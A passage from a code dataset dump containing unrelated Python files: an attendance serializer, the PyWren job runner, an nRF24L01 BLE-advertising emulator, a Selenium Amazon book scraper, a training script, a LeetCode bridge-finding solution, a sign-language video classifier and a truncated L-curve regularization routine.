get_json_time_logs(daily_record)}\n daily_records.append(json_dr)\n return daily_records\n\n def get_json_attendance_records(attendance_records):\n return_attendance_records = []\n for attendance_record in attendance_records:\n json_ar = {\n 'employee_id' : attendance_record.employee_id,\n 'employee_name' : attendance_record.employee_name,\n 'from_date' : datetime.strftime(attendance_record.get_from_date(), DATE_FORMAT),\n 'to_date' : datetime.strftime(attendance_record.get_to_date(), DATE_FORMAT),\n 'total_hours_worked' : round(attendance_record.get_total_hours_worked(), 2),\n 'daily_records' : get_json_daily_records(attendance_record)}\n return_attendance_records.append(json_ar)\n return 
json.dumps(return_attendance_records)\n logging.info('Returning response with %d records.' % (len(attendance_records)))\n return get_json_attendance_records(attendance_records)","sub_path":"HR Functions/GenerateEmployeeAttendanceRecords/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"590361667","text":"from __future__ import print_function\n\nimport base64\nimport json\nimport sys\nimport traceback\n\nfrom six.moves import cPickle as pickle\nfrom tblib import pickling_support\n\npickling_support.install()\n\ndef b64str_to_bytes(str_data):\n str_ascii = str_data.encode('ascii')\n byte_data = base64.b64decode(str_ascii)\n return byte_data\n\ntry:\n func_filename = sys.argv[1]\n data_filename = sys.argv[2]\n out_filename = sys.argv[3]\n # initial output file in case job fails\n pickle.dump({'result' : None,\n 'success' : False},\n open(out_filename, 'wb'), -1)\n\n print(\"loading\", func_filename, data_filename, out_filename)\n func_b64 = b64str_to_bytes(json.load(open(func_filename, 'r'))['func'])\n loaded_func = pickle.loads(func_b64)\n loaded_data = pickle.load(open(data_filename, 'rb'))\n print(\"loaded\")\n y = loaded_func(loaded_data)\n print(\"success\")\n pickle.dump({'result' : y,\n 'success' : True,\n 'sys.path' : sys.path},\n open(out_filename, 'wb'), -1)\n\n\nexcept Exception as e:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_tb(exc_traceback)\n\n # Shockingly often, modules like subprocess don't properly\n # call the base Exception.__init__, which results in them\n # being unpickleable. As a result, we actually wrap this in a try/catch block\n # and more-carefully handle the exceptions if any part of this save / test-reload\n # fails\n\n try:\n with open(out_filename, 'wb') as fid:\n pickle.dump({'result' : e,\n 'exc_type' : exc_type,\n 'exc_value' : exc_value,\n 'exc_traceback' : exc_traceback,\n 'sys.path' : sys.path,\n 'success' : False}, fid, -1)\n\n # this is just to make sure they can be unpickled\n pickle.load(open(out_filename, 'rb'))\n\n except Exception as pickle_exception:\n pickle.dump({'result' : str(e),\n 'exc_type' : str(exc_type),\n 'exc_value' : str(exc_value),\n 'exc_traceback' : exc_traceback,\n 'exc_traceback_str' : str(exc_traceback),\n 'sys.path' : sys.path,\n 'pickle_fail' : True,\n 'pickle_exception' : pickle_exception,\n 'success' : False},\n open(out_filename, 'wb'), -1)\n","sub_path":"pywren/jobrunner.py","file_name":"jobrunner.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"103510449","text":"# The MIT License (MIT)\n#\n# Copyright (c) 2019 Brendan Doherty\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 
MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\"\"\"Original research was done by `Dmitry Grinberg and his write-up can be\nfound here `_\"\"\"\nfrom os import urandom\nimport struct\nfrom .rf24 import RF24\n\n\ndef swap_bits(original):\n \"\"\"This function reverses the bit order for a single byte.\"\"\"\n original &= 0xFF\n reverse = 0\n for _ in range(8):\n reverse <<= 1\n reverse |= original & 1\n original >>= 1\n return reverse\n\n\ndef reverse_bits(original):\n \"\"\"This function reverses the bit order for an entire\n buffer protocol object.\"\"\"\n ret = bytearray(len(original))\n for i, byte in enumerate(original):\n ret[i] = swap_bits(byte)\n return ret\n\n\ndef chunk(buf, data_type=0x16):\n \"\"\"This function is used to pack data values into a block of data that\n make up part of the BLE payload per Bluetooth Core Specifications.\"\"\"\n return bytearray([len(buf) + 1, data_type & 0xFF]) + buf\n\n\ndef crc24_ble(data, deg_poly=0x65B, init_val=0x555555):\n \"\"\"This function calculates a checksum of various sized buffers.\"\"\"\n crc = init_val\n for byte in data:\n crc ^= swap_bits(byte) << 16\n for _ in range(8):\n if crc & 0x800000:\n crc = (crc << 1) ^ deg_poly\n else:\n crc <<= 1\n crc &= 0xFFFFFF\n return reverse_bits((crc).to_bytes(3, \"big\"))\n\n\nBLE_FREQ = (2, 26, 80,)\n\"\"\"The BLE channel number is different from the nRF channel number.\"\"\"\n\n\nclass FakeBLE(RF24):\n \"\"\"A class to implement BLE advertisements using the nRF24L01.\"\"\"\n\n def __init__(self, spi, csn, ce_pin, spi_frequency=10000000):\n super().__init__(spi, csn, ce_pin, spi_frequency=spi_frequency)\n self._curr_freq = 0\n self._show_dbm = False\n self._ble_name = None\n self._mac = urandom(6)\n self._config = self._config & 3 | 0x10 # disable CRC\n # disable auto_ack, dynamic payloads, all TX features, & auto-retry\n self._aa, self._dyn_pl, self._features, self._retry_setup = (0,) * 4\n self._addr_len = 4 # use only 4 byte address length\n self._tx_address[:4] = b\"\\x71\\x91\\x7D\\x6B\"\n with self:\n self.payload_length = 32\n super().open_rx_pipe(0, b\"\\x71\\x91\\x7D\\x6B\\0\")\n\n def __exit__(self, *exc):\n self._show_dbm = False\n self._ble_name = None\n return super().__exit__()\n\n @property\n def mac(self):\n \"\"\"This attribute returns a 6-byte buffer that is used as the\n arbitrary mac address of the BLE device being emulated.\"\"\"\n return self._mac\n\n @mac.setter\n def mac(self, address):\n if address is None:\n self._mac = urandom(6)\n if isinstance(address, int):\n self._mac = (address).to_bytes(6, \"little\")\n elif isinstance(address, (bytearray, bytes)):\n self._mac = address\n if len(self._mac) < 6:\n self._mac += urandom(6 - len(self._mac))\n\n @property\n def name(self):\n \"\"\"The broadcasted BLE name of the nRF24L01.\"\"\"\n return self._ble_name\n\n @name.setter\n def name(self, n):\n if n is not None:\n if not isinstance(n, (bytes, bytearray)):\n raise ValueError(\"name must be a bytearray or bytes object.\")\n if len(n) > (18 - self._show_dbm * 3):\n raise ValueError(\"name length exceeds maximum.\")\n self._ble_name = n\n\n @property\n def show_pa_level(self):\n \"\"\"If this attribute is `True`, the payload will automatically include\n the nRF24L01's `pa_level` in 
the advertisement.\"\"\"\n return bool(self._show_dbm)\n\n @show_pa_level.setter\n def show_pa_level(self, enable):\n if enable and len(self.name) > 16:\n raise ValueError(\"there is not enough room to show the pa_level.\")\n self._show_dbm = bool(enable)\n\n def hop_channel(self):\n \"\"\"Trigger an automatic change of BLE compliant channels.\"\"\"\n self._curr_freq += 1 if self._curr_freq < 2 else -2\n self.channel = BLE_FREQ[self._curr_freq]\n\n def whiten(self, data):\n \"\"\"Whitening the BLE packet data ensures there's no long repetition\n of bits.\"\"\"\n data, coef = (bytearray(data), (self._curr_freq + 37) | 0x40)\n for i, byte in enumerate(data):\n res, mask = (0, 1)\n for _ in range(8):\n if coef & 1:\n coef ^= 0x88\n byte ^= mask\n mask <<= 1\n coef >>= 1\n data[i] = byte ^ res\n return data\n\n def _make_payload(self, payload):\n \"\"\"Assemble the entire packet to be transmitted as a payload.\"\"\"\n if self.len_available(payload) < 0:\n raise ValueError(\n \"Payload length exceeds maximum buffer size by \"\n \"{} bytes\".format(abs(self.len_available(payload)))\n )\n name_length = (len(self.name) + 2) if self.name is not None else 0\n pl_size = 9 + len(payload) + name_length + self._show_dbm * 3\n buf = bytes([0x42, pl_size]) + self.mac\n buf += chunk(b\"\\x05\", 1)\n pa_level = b\"\"\n if self._show_dbm:\n pa_level = chunk(struct.pack(\">b\", self.pa_level), 0x0A)\n buf += pa_level\n if name_length:\n buf += chunk(self.name, 0x08)\n buf += payload\n buf += crc24_ble(buf)\n return buf\n\n def len_available(self, hypothetical=b\"\"):\n \"\"\"This function will calculates how much length (in bytes) is\n available in the next payload.\"\"\"\n name_length = (len(self.name) + 2) if self.name is not None else 0\n return 18 - name_length - self._show_dbm * 3 - len(hypothetical)\n\n def advertise(self, buf=b\"\", data_type=0xFF):\n \"\"\"This blocking function is used to broadcast a payload.\"\"\"\n if not isinstance(buf, (bytearray, bytes, list, tuple)):\n raise ValueError(\"buffer is an invalid format\")\n payload = b\"\"\n if isinstance(buf, (list, tuple)):\n for b in buf:\n payload += b\n else:\n payload = chunk(buf, data_type) if buf else b\"\"\n payload = self._make_payload(payload)\n self.send(reverse_bits(self.whiten(payload)))\n\n @property\n def channel(self):\n \"\"\"The only allowed channels are those contained in the `BLE_FREQ`\n tuple.\"\"\"\n return self._channel\n\n @channel.setter\n def channel(self, value):\n if value not in BLE_FREQ:\n raise ValueError(\"channel {} is not a valid BLE frequency\".format(value))\n self._channel = value\n self._reg_write(0x05, value)\n\n # pylint: disable=missing-function-docstring\n @property\n def dynamic_payloads(self):\n raise NotImplementedError(\n \"adjusting dynamic_payloads breaks BLE specifications\"\n )\n\n def set_dynamic_payloads(self, enable, pipe_number=None):\n raise NotImplementedError(\n \"adjusting dynamic_payloads breaks BLE specifications\"\n )\n\n @property\n def data_rate(self):\n raise NotImplementedError(\"adjusting data_rate breaks BLE specifications\")\n\n @property\n def address_length(self):\n raise NotImplementedError(\"adjusting address_length breaks BLE specifications\")\n\n @property\n def auto_ack(self):\n raise NotImplementedError(\"adjusting auto_ack breaks BLE specifications\")\n\n def set_auto_ack(self, enable, pipe_number=None):\n raise NotImplementedError(\"adjusting auto_ack breaks BLE specifications\")\n\n @property\n def ack(self):\n raise NotImplementedError(\"adjusting ack breaks BLE 
specifications\")\n\n @property\n def crc(self):\n raise NotImplementedError(\"adjusting crc breaks BLE specifications\")\n\n def open_rx_pipe(self, pipe_number, address):\n raise NotImplementedError(\"BLE implementation only uses 1 address on pipe 0\")\n\n def open_tx_pipe(self, address):\n raise NotImplementedError(\"BLE implentation only uses 1 address\")\n\n # pylint: enable=missing-function-docstring\n def print_details(self, dump_pipes=False):\n \"\"\"This debuggung function aggregates and outputs all status/condition\n related information from the nRF24L01.\"\"\"\n print(\"Is a plus variant_________{}\".format(self.is_plus_variant))\n print(\"BLE device name___________{}\".format(str(self.name)))\n print(\"Broadcasting PA Level_____{}\".format(self.show_pa_level))\n print(\n \"Channel___________________{} ~ {} GHz\".format(\n self.channel, (self.channel + 2400) / 1000\n )\n )\n print(\"RF Data Rate______________1 Mbps\")\n print(\"RF Power Amplifier________{} dbm\".format(self.pa_level))\n print(\n \"RF Low Noise Amplifier____{}\".format(\n \"Enabled\" if self.is_lna_enabled else \"Disabled\"\n )\n )\n print(\"CRC bytes_________________3\")\n print(\"Address length____________4 bytes\")\n print(\"TX Payload lengths________{} bytes\".format(self.payload_length))\n print(\"Auto retry delay__________250 microseconds\")\n print(\"Auto retry attempts_______0 maximum\")\n print(\"Re-use TX FIFO____________{}\".format(bool(self._reg_read(0x17) & 64)))\n print(\n \"IRQ on Data Ready__{} Data Ready___________{}\".format(\n \"_Enabled\" if not self._config & 0x40 else \"Disabled\", self.irq_dr\n )\n )\n print(\n \"IRQ on Data Fail___{} Data Failed__________{}\".format(\n \"_Enabled\" if not self._config & 0x10 else \"Disabled\", self.irq_df\n )\n )\n print(\n \"IRQ on Data Sent___{} Data Sent____________{}\".format(\n \"_Enabled\" if not self._config & 0x20 else \"Disabled\", self.irq_ds\n )\n )\n print(\n \"TX FIFO full__________{} TX FIFO empty________{}\".format(\n \"_True\" if self.tx_full else \"False\", self.fifo(True, True)\n )\n )\n print(\n \"RX FIFO full__________{} RX FIFO empty________{}\".format(\n \"_True\" if self.fifo(False, False) else \"False\", self.fifo(False, True)\n )\n )\n print(\n \"Ask no ACK_________{} Custom ACK Payload___Disabled\".format(\n \"_Allowed\" if self.allow_ask_no_ack else \"Disabled\",\n )\n )\n print(\"Dynamic Payloads___Disabled Auto Acknowledgment__Disabled\")\n print(\n \"Primary Mode_____________{} Power Mode___________{}\".format(\n \"RX\" if self.listen else \"TX\",\n (\"Standby-II\" if self.ce_pin.value else \"Standby-I\")\n if self._config & 2\n else \"Off\",\n )\n )\n if dump_pipes:\n self._dump_pipes()\n\n\nclass ServiceData:\n \"\"\"An abstract helper class to package specific service data using\n Bluetooth SIG defined 16-bit UUID flags to describe the data type.\"\"\"\n\n def __init__(self, uuid):\n self._type = struct.pack(\"B\", value)\n\n\nclass UrlServiceData(ServiceData):\n \"\"\"This derivitive of the `ServiceData` class can be used to represent\n URL data as a `bytes` value.\"\"\"\n\n def __init__(self):\n super().__init__(0xFEAA)\n self._type += bytes([0x10]) + struct.pack(\">b\", -25)\n\n @property\n def pa_level_at_1_meter(self):\n \"\"\"The TX power level (in dBm) at 1 meter from the nRF24L01. 
This\n defaults to -25 (due to testing when broadcasting with 0 dBm) and must\n be a 1-byte signed `int`."""\n return struct.unpack(">b", self._type[-1:])[0]\n\n @pa_level_at_1_meter.setter\n def pa_level_at_1_meter(self, value):\n self._type = self._type[:-1] + struct.pack(">b", int(value))\n\n @property\n def uuid(self):\n return self._type[:2]\n\n @ServiceData.data.setter\n def data(self, value):\n value = value.replace("http://www.", "\x00")\n value = value.replace("https://www.", "\x01")\n value = value.replace("http://", "\x02")\n value = value.replace("https://", "\x03")\n value = value.replace(".com/", "\x00")\n value = value.replace(".org/", "\x01")\n value = value.replace(".edu/", "\x02")\n value = value.replace(".net/", "\x03")\n value = value.replace(".info/", "\x04")\n value = value.replace(".biz/", "\x05")\n value = value.replace(".gov/", "\x06")\n value = value.replace(".com", "\x07")\n value = value.replace(".org", "\x08")\n value = value.replace(".edu", "\x09")\n value = value.replace(".net", "\x0A")\n value = value.replace(".info", "\x0B")\n value = value.replace(".biz", "\x0C")\n self._data = value.replace(".gov", "\x0D").encode("utf-8")\n","sub_path":"circuitpython_nrf24l01/fake_ble.py","file_name":"fake_ble.py","file_ext":"py","file_size_in_byte":15693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"551644661","text":"from selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.chrome.service import Service\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\nimport csv\r\n\r\nchrome_path = '/usr/bin/chromium-browser'\r\nchromedriver_path = '/usr/lib/chromium/chromedriver'\r\no = Options()\r\no.binary_location = '/usr/bin/chromium-browser'\r\no.add_argument('--headless')\r\no.add_argument('--disable-gpu')\r\no.add_argument('--no-sandbox')\r\no.add_argument('--window-size=1200x600')\r\n\r\n"""\r\nSample test\r\n"""\r\nd = webdriver.Chrome(chromedriver_path, options=o)\r\n\r\nurl ='https://www.amazon.co.jp/s?i=stripbooks&bbn=2278488051&rh=n%3A465392%2Cn%3A465610%2Cn%3A466280%2Cn%3A2278488051%2Cp_6%3AAN1VRQENFRJN5%2Cp_n_publication_date%3A2285539051&dc&qid=1590279932&rnid=82836051&ref=sr_nr_p_n_publication_date_3'\r\n\r\nd.get(url)\r\n\r\nhtml = d.page_source\r\n\r\nsoup = BeautifulSoup(html,"html.parser")\r\n\r\nf = open("output.csv","w")\r\ndate_f = open("output_date.csv","w")\r\nlink_f = open("output_link.csv","w")\r\n\r\n\r\ntitle_list = []\r\ndate_list =[]\r\nlink_list =[]\r\n\r\nwhile True:\r\n print("######################now-page:{0} ########################".format(d.current_url))\r\n print("Starting to get posts...")\r\n bk_title = [i.get_text() for i in soup.select("[class='a-size-medium a-color-base a-text-normal']")]\r\n date = [i.get_text() for i in soup.select("[class='a-size-base a-color-secondary a-text-normal']")]\r\n link = [tag.get('href') for tag in soup.select("[class='a-link-normal a-text-normal']")]\r\n\r\n\r\n print(len(bk_title))\r\n print(len(date))\r\n print(len(link))\r\n\r\n\r\n\r\n for i in range(len(bk_title)):\r\n title_list.append([bk_title[i]])\r\n date_list.append([date[i].strip()])\r\n link_list.append(['https://www.amazon.co.jp'+link[i]])\r\n\r\n # page_num+=1\r\n # btn = soup.find('.a-last')\r\n if len(soup.select("[class='a-last']")) == 0:\r\n print("no pager exists anymore")\r\n break\r\n
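 # the 'a-last' pager cell may hold more than one anchor, so only the first\r\n # href is followed; soup is rebuilt after navigating so the next loop pass\r\n # parses the new page instead of the stale one\r\n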
d.get('https://www.amazon.co.jp' + next_url[0])  # next_url is a list of relative hrefs; take the first and make it absolute\n    d.implicitly_wait(10)\n    print(\"Moving to next page\")\n    time.sleep(10)\n    # re-parse the freshly loaded page so the next iteration does not rescrape stale HTML\n    html = d.page_source\n    soup = BeautifulSoup(html,\"html.parser\")\n\nwritecsv = csv.writer(f,lineterminator='\\n')\nwrite_date_csv = csv.writer(date_f,lineterminator='\\n')\nwrite_link_csv = csv.writer(link_f,lineterminator='\\n')\n\nwritecsv.writerows(title_list)\nwrite_date_csv.writerows(date_list)\nwrite_link_csv.writerows(link_list)\nf.close()\ndate_f.close()\nlink_f.close()\nd.quit()\n","sub_path":"app/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"323185585","text":"import config\r\nfrom train.constrastive.Ttrain import Ttrain, Ttest\r\nfrom train.constrastive.Vtrain import Vtrain, Vtest\r\nfrom train.constrastive.Atrain import Atest, Atrain\r\n\r\n\r\nif __name__ == '__main__':\r\n    # metrics used to track performance\r\n    load_metric = config.SIMS.downStream.load_metric\r\n    check_list = config.SIMS.downStream.check_list\r\n    metric = config.SIMS.downStream.metric\r\n    # select which model to save\r\n    check = config.SIMS.downStream.check\r\n    result_path = config.SIMS.path.result_path\r\n    seed = config.seed\r\n\r\n    print('text pretrain')\r\n    Ttrain(check={'MAE':10000}, config=config)\r\n    Ttest(check_list=['MAE'], config=config)\r\n\r\n    print('vision pretrain')\r\n    Vtrain(check={'MAE':10000}, config=config)\r\n    Vtest(check_list=['MAE'], config=config)\r\n\r\n    print('audio pretrain')\r\n    Atrain(check={'MAE':10000}, config=config)\r\n    Atest(check_list=['MAE'], config=config)\r\n","sub_path":"SIMS/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"250350285","text":"from collections import defaultdict\nfrom typing import Dict, List, Set\n\n\ndef get_cc(n, edges: Dict[int, Set[int]]) -> List[List[int]]:\n    \"\"\"\n    :param n: number of vertices\n    :param edges: mapping from vertex to set of neighboring vertices\n    :return: list of cut edges\n    \"\"\"\n    visit_time = [None] * n\n    output = []\n    curr_index = 0\n\n    def dfs(u: int, parent=None) -> int:\n        \"\"\"\n        :param u: unvisited vertex\n        :param parent: parent of \"u\" vertex\n        :return: the earliest visit time reachable from \"u\": if \"u\" lies on a cycle,\n        that is the visit time of the ancestor through which DFS entered the cycle;\n        otherwise it is the time at which DFS visited \"u\" itself\n        \"\"\"\n        nonlocal curr_index\n        visited_time_of_u = curr_index\n        curr_index += 1\n\n        visit_time[u] = visited_time_of_u\n\n        for v in edges[u]:\n            if v != parent:\n                if visit_time[v] is None:\n                    t = dfs(v, parent=u)\n\n                    if visited_time_of_u < t:  # no loop possible\n                        output.append([u, v])\n\n                visit_time[u] = min(visit_time[u], visit_time[v])\n\n        return visit_time[u]\n\n    for i in range(n):\n        if visit_time[i] is None:  # unvisited vertex\n            dfs(i)\n\n    return output\n\n\nclass Solution:\n    def criticalConnections(self, n: int, connections: List[List[int]]) -> List[List[int]]:\n        \"\"\"\n        List all the cut edges (bridges) of the graph.\n\n        An edge is a cut edge <=> it belongs to no cycle\n\n        :param n: number of vertices\n        :param connections: list of edges (each edge is a two-element list of its end vertices)\n        :return: list of cut edges\n        \"\"\"\n\n        edges = defaultdict(set)\n\n        for u, v in connections:\n            edges[u].add(v)\n            edges[v].add(u)\n\n        return get_cc(n, edges)\n
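\n\nif __name__ == '__main__':\n    # Editor's illustrative check (not in the original file): in this 4-node graph the\n    # triangle 0-1-2 forms a cycle, so the only bridge (critical connection) is [1, 3].\n    print(Solution().criticalConnections(4, [[0, 1], [1, 2], [2, 0], [1, 3]]))  # -> [[1, 3]]\n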
","sub_path":"leetcodeOthers/problem1192.py","file_name":"problem1192.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"569131693","text":"import os\nimport argparse\nfrom numpy.core.defchararray import count\nimport requests\nimport torch\nimport torch.nn as nn\nfrom torchvision import transforms\nimport videotransforms\nimport numpy as np\nimport torch.nn.functional as F\nfrom pytorch_i3d import InceptionI3d\nfrom datasets.nslt_dataset_all import NSLT as Dataset, get_num_class\nfrom cv2 import cv2\n\nclass Predictor:\n    def __init__(self):\n        myfile = open(r'preprocess/wlasl_class_list.txt', 'r')\n        self.image_path = 'new_pred.MP4'\n        i = 0\n        self.dict_of_labels = {}\n        for line in myfile.readlines():\n            i+=1\n            values = line.split('\\t')\n            self.dict_of_labels[values[0]] = values[1][:-1]\n        myfile.close()\n\n        num_class = 2000\n        self.i3d = InceptionI3d(400, in_channels=3)\n        self.i3d.load_state_dict(torch.load('weights/rgb_imagenet.pt', map_location=torch.device('cpu')))\n        self.i3d.replace_logits(num_class)\n        self.i3d.load_state_dict(torch.load(r\"archived/asl2000/FINAL_nslt_2000_iters=5104_top1=32.48_top5=57.31_top10=66.31.pt\", map_location=torch.device('cpu')))\n        self.i3d.eval()\n\n    def download_from_firebase(self, url):\n        i=0\n        r = requests.get(url, stream=True)\n        if r.status_code==200:\n            with open(self.image_path, 'wb') as f:\n                for chunk in r:\n                    f.write(chunk)\n        return self.image_path\n\n    def load_rgb_frames_from_video(self, video_path, start=0, num=-1):\n        vidcap = cv2.VideoCapture(video_path)\n\n        frames = []\n\n        vidcap.set(cv2.CAP_PROP_POS_FRAMES, start)\n        if num == -1:\n            num = int(vidcap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n        for offset in range(num):\n            success, img = vidcap.read()\n\n            h, w, c = img.shape  # OpenCV frames are (height, width, channels); the original unpacked them as w, h, c\n            sc = 224 / h\n            img = cv2.resize(img, dsize=(0, 0), fx=sc, fy=sc)\n\n            img = (img / 255.) 
* 2 - 1\n\n frames.append(img)\n \n ans = np.asarray(frames, dtype=np.float32)\n ans=torch.Tensor(ans)\n input_list = [ans]\n transforms_test = transforms.Compose([videotransforms.CenterCrop(224)])\n transpose_t = transforms_test(ans)\n transpose_t_input = transpose_t.permute(3,0,1,2)\n input_for_torch_model = transpose_t_input[None, :, :] \n return input_for_torch_model\n\n def get_best_class_for_video(self, input_tensor):\n logits = self.i3d(input_tensor)\n predictions = torch.max(logits, dim=2)[0]\n out_labels = np.argsort(predictions.cpu().detach().numpy()[0])\n out_probs = np.sort(predictions.cpu().detach().numpy()[0])\n top_5_labels = out_labels[-5:]\n top_5_probs = out_probs[-5:]\n best_match = torch.argmax(predictions[0]).item()\n best_label = self.dict_of_labels[str(best_match)]\n\n return best_label, [(self.dict_of_labels[str(top_5_labels[-i])], top_5_probs[-i]) for i in range(1,6)]\n\n def get_final_labels_in_video(self, url):\n dict_top_5_levels = {}\n final_labels =[]\n \n video_path = self.download_from_firebase(url)\n input_tensors_list = self.load_rgb_frames_from_video(video_path, start=0, num=-1)\n prev_label, prev_5_prev_label = self.get_best_class_for_video(input_tensors_list)\n dict_top_5_levels[prev_label] = prev_5_prev_label\n \n final_labels.append(prev_label)\n os.remove(self.image_path)\n ans_dict = {}\n for (k, v) in dict_top_5_levels.items():\n for i in v:\n ans_dict[i[0]] = f'{i[1]:.2f}'\n return ans_dict\n\nif __name__ == '__main__':\n pred = Predictor()\n top_5_pred = pred.get_final_labels_in_video(\n \"https://firebasestorage.googleapis.com/v0/b/barfi-5faf3.appspot.com/o/a%20lot.mp4?alt=media&token=44161bcb-49be-463f-a98a-eb9a99b842e9\")\n print(top_5_pred)\n","sub_path":"get_pred_on_single_video.py","file_name":"get_pred_on_single_video.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"193511598","text":"def residuals(s, C, ay, Methods, Reg_L1, Reg_L2, Reg_C, Reg_S, Bounds, Nz, LCurve = False):\n\n from laplace import laplace\n #from matplotlib.cm import jet\n import matplotlib.pyplot as plt\n import numpy as np\n from scipy.signal import savgol_filter\n\n import sys\n\n def progressbar(i, iterations):\n i = i + 1\n sys.stdout.write('\\r')\n # the exact output you're looking for:\n sys.stdout.write(\"[%-20s] %d%% Building L-curve\" % ('#'*np.ceil(i*100/iterations*0.2).astype('int'), np.ceil(i*100/iterations)))\n sys.stdout.flush()\n\n def curvature(x, y, a):\n '''Returns curvature of line\n\n k = (x'*y''-x''*y')/((x')^2+(y')^2)^(3/2)\n\n '''\n x = savgol_filter(x, 13, 1)\n y = savgol_filter(y, 13, 1)\n da = np.gradient(a)\n f_x = np.gradient(x)/da\n f_y = np.gradient(y)/da\n f_xx = np.gradient(f_x)/da\n f_yy = np.gradient(f_y)/da\n\n k = (f_x*f_yy - f_xx*f_y)/(f_x**2 + f_y**2)**(3/2)\n return savgol_filter(k, 5, 1)\n #return k\n\n res = []\n sol = []\n\n alpha_L2 = 10**np.linspace(np.log10(Reg_L2) - 3, np.log10(Reg_L2) + 3, 40)\n alpha_C = 10**np.linspace(np.log10(Reg_C) - 3, np.log10(Reg_C) + 3, 40)\n alpha_S = 10**np.linspace(np.log10(Reg_S) - 3, np.log10(Reg_S) + 3, 40)\n if LCurve:\n alpha_C = 10**np.linspace(np.log10(Reg_C) - 3, np.log10(Reg_C) + 3, 40)\n alpha = alpha_C\n\n data = []\n\n Cx = C\n\n for i in Methods:\n\n if len(Methods) > 1:\n print('!!!Choose only one Method!!!')\n break\n\n if i == 'L1':\n break\n\n elif i == 'L2':\n for j, v in enumerate(alpha_L2):\n data = laplace(s, C, Nz, Reg_L1, v, Reg_C, Reg_S, Bounds, Methods)\n e, f, C_restored 
= data[0][0], data[0][1], data[0][2]\n\n res.append(np.linalg.norm(np.abs(Cx) - np.abs(C_restored), ord = 2)**2)\n sol.append(np.linalg.norm(f, ord = 2)**2)\n progressbar(j, len(alpha_L2))\n alpha = alpha_L2\n break\n\n elif i == 'L1+L2':\n break\n\n elif i == 'Contin':\n for j, v in enumerate(alpha_C):\n data = laplace(s, C, Nz, Reg_L1, Reg_L2, v, Reg_S, Bounds, Methods)\n e, f, C_restored = data[0][0], data[0][1], data[0][2]\n\n res.append(np.linalg.norm(np.abs(Cx) - np.abs(C_restored), ord = 2)**2)\n #sol.append(np.linalg.norm(f, ord = 2)**2)\n sol.append(np.linalg.norm(f*e, ord = 2)**2)\n progressbar(j, len(alpha_C))\n alpha = alpha_C\n break\n\n elif i == 'reSpect':\n for j, v in enumerate(alpha_S):\n data = laplace(s, C, Nz, Reg_L1, Reg_L2, Reg_C, v, Bounds, Methods)\n e, f, C_restored = data[0][0], data[0][1], data[0][2]\n\n res.append(np.linalg.norm(np.abs(Cx - Cx[-1]) - np.abs(C_restored - C_restored[-1]), ord = 2)**2)\n sol.append(np.linalg.norm(f, ord = 2)**2)\n progressbar(j, len(alpha_S))\n alpha = alpha_S\n break\n\n\n\n if len(data) == 0:\n ay.annotate(text = 'Choose only one method \\n Contin, reSpect or L2', xy = (0.5,0.5), ha=\"center\", size = 16)\n plt.tight_layout()\n elif LCurve:\n k = curvature(np.log10(res), np.log10(sol), alpha)\n k_max = np.amax(k)\n if Methods[0] == 'reSpect':\n i = np.where(k == np.amax(k[1:-1]))\n else:\n i = np.where(k == np.amax(k[1:-1]))\n i = np.squeeze(i)\n return alpha[i]\n else:\n k = curvature(np.log10(res), np.log10(sol), alpha)\n k_max = np.amax(k)\n i = np.where(k == np.amax(k))\n if Methods[0] != 'reSpect':\n i = np.where(k == np.amax(k[1:-1]))\n i = np.squeeze(i)\n\n ay.plot(np.log10(res), np.log10(sol), 'k-', )\n ay.plot(np.log10(res[i]), np.log10(sol[i]), 'r*') #highlight optimal lambda\n ay.set_ylabel(r'Solution norm $\\lg||x||^2_2$', c='k')\n ay.set_xlabel(r'Residual norm $\\lg||\\eta-Cx||^2_2$', c='k')\n\n ay_k = ay.twinx()\n ay_k_t = ay_k.twiny()\n ay_k_t.set_xscale('log')\n ay_k_t.plot(alpha, k/k[i], 'r-')\n ay_k_t.plot(alpha[i], k[i]/k[i], 'r*')\n ay_k.set_ylabel(r'Curvature, arb. units', c='r')\n ay_k.set_ylim(-0.1, 1.1)\n #ay_k.set_yscale('log')\n #ay_k.set_ylim(1e-3, 2.0)\n ay_k_t.set_xlabel(r'Reg. 
